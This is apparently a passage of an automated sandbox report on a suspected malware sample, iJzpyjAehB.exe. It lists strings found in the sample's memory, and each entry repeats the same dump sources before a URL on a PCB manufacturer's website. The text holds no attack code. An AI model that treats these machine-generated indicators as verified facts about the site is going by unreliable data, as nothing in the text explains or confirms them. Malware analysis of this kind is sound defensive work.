00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/awards-certificates/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/our-facilities/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/privacy-policy/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/referral-program/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/rohs/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/satisfaction-guarantee/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/shipping-cost/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/terms-of-service/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.2.2
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/lightbox-2/lightbox.js?ver=1.8
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/wp-simple-firewall/resources/js/shield/notbot.js?ver=17.0.
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/login1.gif
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/register1.gif
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/shopping_car.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/js/easySlider.js
